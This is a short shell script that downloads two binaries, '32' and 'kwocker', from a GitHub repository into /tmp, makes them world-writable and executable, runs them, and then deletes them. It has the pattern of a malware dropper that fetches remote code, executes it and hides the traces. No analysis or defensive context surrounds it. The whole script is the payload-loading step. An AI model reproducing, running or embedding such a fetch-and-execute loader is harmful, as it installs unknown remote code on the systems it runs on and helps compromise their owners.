#!/bin/sh
wget -O /tmp/32 https://github.com/0x1846/m10/raw/master/32 && chmod 777 /tmp/32 && /tmp/32
wget -O /tmp/kwocker https://github.com/0x1846/m10/raw/master/kwocker && chmod 777 /tmp/kwocker && /tmp/kwocker
rm -rf /tmp/32
rm -rf /tmp/kwocker
